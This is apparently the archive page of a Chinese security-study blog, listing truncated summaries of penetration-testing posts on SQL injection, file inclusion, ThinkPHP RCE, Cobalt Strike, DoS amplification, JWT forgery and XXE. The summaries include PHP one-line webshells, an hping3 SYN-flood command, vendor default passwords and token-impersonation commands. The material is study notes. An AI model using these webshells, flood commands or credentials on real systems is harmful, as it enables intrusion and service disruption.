09 2020 档案
摘要:***************** netcat nc 网络工具中的瑞士军刀 侦听模式/传输模式 telnet/获取banner信息 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬件 1. nc -vn 客户端时:-v:显示详细的输出内容 -n:o
阅读全文
摘要:无线渗透 无线局域网 IEEE 802委员会负责LAN(局域网),MAN(城域网)等 802.3 Ethernet局域网 *802.11 wireless LAN(WLAN) and Mesh(Wi-Fi) 802.15 个人网络,蓝牙等 802.11工作在物理层,数据链路层,无线频宽资源有限(国家
阅读全文
摘要:WAF绕过-web后门篇 常见一句话: <?php eval($_POST['abc']);?> <?php assert($_POST['abc']);?> 变量覆盖 <?php$a=$_GET['X'];$$a=$_GET['Y'];$b($_POST['Z']);?>//x=b&y=asser
阅读全文
摘要:堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者un
阅读全文
摘要:文件包含漏洞 参考:https://www.cnblogs.com/endust/p/11804767.html //php伪协议 1 <?php 2 show_source(__FILE__); 3 echo $_GET['hello']; 4 $page=$_GET['page']; 5 whi
阅读全文
摘要:ThinkPHP 命令执行漏洞5.x < 5.1.31, <= 5.0.23 参考:https://www.cnblogs.com/backlion/p/10106676.html 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程: 输入:http://your-ip:8080/ind
阅读全文
摘要:源码: 1 <?php 2 class Demo { 3 private $file = 'index.php'; 4 public function __construct($file) { 5 $this->file = $file; 6 } 7 function __destruct() {
阅读全文
摘要:题目:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072&page=1 1.打开页面,进行代码审计,发现同时满足 $a==0 和 $a 时,显示flag1。 2.php中的弱类型比较会使'abc' ==
阅读全文
摘要:robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。 如果将网站视
阅读全文
摘要:设备 默认账号 默认密码 深信服产品sangforsangfor sangfor@2018 sangfor@2019 深信服科技 ADdlanrecover 深信服负载均衡 AD 3.6adminadmin 深信服WAC ( WNS V2.6)adminadmin 深信服VPNAdminAdmin
阅读全文
摘要:信息泄露 备份文件下载: index.php.bak 多尝试下.bak文件路径,看有没有下载的 常见的网站源码备份文件后缀 tar tar.gz zip rar 常见的网站源码备份文件名 web website backup back www wwwroot temp 可以做成字典,用burp扫描
阅读全文
摘要:模拟爬虫引擎绕过一些防火墙 1 #搜索引擎爬虫模拟及模拟真实用户 2 import requests 3 import time 4 5 headers={ 6 'Connection': 'keep-alive', 7 'Cache-Control': 'max-age=0', 8 'Upgrad
阅读全文
摘要:py脚本base64编码,用于破解tomcat默认后台 文件读取,写入,base64编码,加前缀 1 #!/usr/bin/env python3 2 import base64 3 4 # 字典文件路径 5 dic_file_path = '/Users/wujing/Downloads/10_m
阅读全文
摘要:PTH,SMB及WMI横向移动利用NTLM、Kerberos及SMB等协议。攻击者进入内网后会进行横向移动建立多个立足点,常见的技巧包括凭证窃取、横向移动、Pass The Hash(hash传递)、导出域成员Hash、黄金白银票据、MS14-068,MS17-010等。其中本次课程将围绕NTLM,
阅读全文
摘要:#会话劫持(Session hijacking): [v1 54tian] 这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户,因此需要保证会话标
阅读全文
摘要:提权 令牌窃取:窃取system用户的权限,注入system权限的进程 #msf自带模块窃取 管理员 >系统权限 前提:需要管理员权限 输入三条命令: use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" #烂土豆及
阅读全文
摘要:part1 基本信息收集 旨在了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备 systeminfo 详细信息 net start 启动服务 tasklist 进程列表 schtasks 计划任务 part2 网络信息收集 旨在了解当前服务器的网络接口信息,为判断当前角色,功能
阅读全文
摘要:CobaltStrike-机器上线微信提醒 这两天看cs看的头大 原文地址:http://www.nmd5.com/?p=567 Server酱申请账号 我们先申请一个Server酱的账号,使用Github账号即可登录,地址: http://sc.ftqq.com/ 申请SCKEY 登录之后,如下:
阅读全文
摘要:Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java 11,或OpenJDK 11。 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件。
阅读全文
摘要:利用ssh传输文件 在linux下一般用scp这个命令来通过ssh传输文件。 1、从服务器上下载文件scp username@servername:/path/filename /var/www/local_dir(本地目录) 例如scp root@192.168.0.101:/var/www/te
阅读全文
摘要:Linux 系统默认未自带 screen 工具,需要先进行安装:CentOS 系列系统: yum install screenUbuntu 系列系统: sudo apt-get install screen使用简介1. 创建 screen 窗口screen -S name# name可以设置为ssh
阅读全文
摘要:printspoofer提权工具 使用方法 PrintSpoofer v0.1 (by @itm4n) Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
阅读全文
摘要:Hping3几乎可以定制发送任何tcp/ip数据包,用于测试fw,端口扫描,性能测试 1 Syn Flood 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一条命令搞定 3 -c 计数器,多次数据包
阅读全文
摘要:DNS放大攻击产生大流量的攻击方式 udpDNS放大效果-查询请求流量小,但响应流量可能非常巨大-dig ANY baidu.com @1.1.1.1 //向1.1.1.1的服务器查询域名解析,流量放大8倍左右 SNMP放大攻击简单网络管理协议服务端口 UDP 161/162 NTP放大攻击网络时间
阅读全文
摘要:Sockstress放大攻击原理:攻击者向目标发送一个很小的流量,但是会造成产生的攻击流量是一个巨大的、成百上千倍上万倍流量被放大的一个效果,才适合作为一个拒绝服务攻击效果。(实现攻击者很小的流量打垮一个看似很大的被攻击者)针对tcp服务的拒绝服务攻击-消耗被攻击目标系统资源-建立大量socket连
阅读全文
摘要:Dos拒绝服务利用程序漏洞或一对一资源耗尽的Denial of Service 拒绝服务DDos 分布式拒绝服务 多对一 Syn-Flood泛洪攻击 发送syn包欺骗服务器建立半连接 攻击代码,利用scapy Scapy – i=IP() – i.dst=1.1.1.1 – i.display()
阅读全文
摘要:JWT修改伪造攻击 什么是JWT? JSON Web Token(JSON Web令牌)是一种跨域验证身份的方案。JWT不加密传输的数据,但能够通过数字签名来验证数据未被篡改(但是做完下面的WebGoat练习后我对这一点表示怀疑)。 JWT分为三部分,头部(Header),声明(Claims),签名
阅读全文
摘要:序列化:WriteObject 反序列化:readObject() Jd-gui.exe 最简单的打开java文件方式 Intellij idea 编辑工具 演示案例: WebGoat_Javaweb靶场反序列化测试 java -Dhibernate5 -cp hibernate-core-5.4.
阅读全文
摘要:主机漏洞发现 exp:利用 poc:验证 #漏洞发现-操作系统之漏洞探针 角色扮演:操作系统权限的获取会造成服务器上安全问题 漏扫工具:Goby,Nmap,Nessus,Openvas,等 漏洞类型:权限提升,缓冲器溢出,远程代码执行,未知Bug等 漏洞利用:工具框架集成类,漏洞公布平台库类,复现文
阅读全文
摘要:反序列化漏洞 #PHP反序列化 原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 serialize() //将一个对象转换
阅读全文
摘要:XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序
阅读全文

浙公网安备 33010602011771号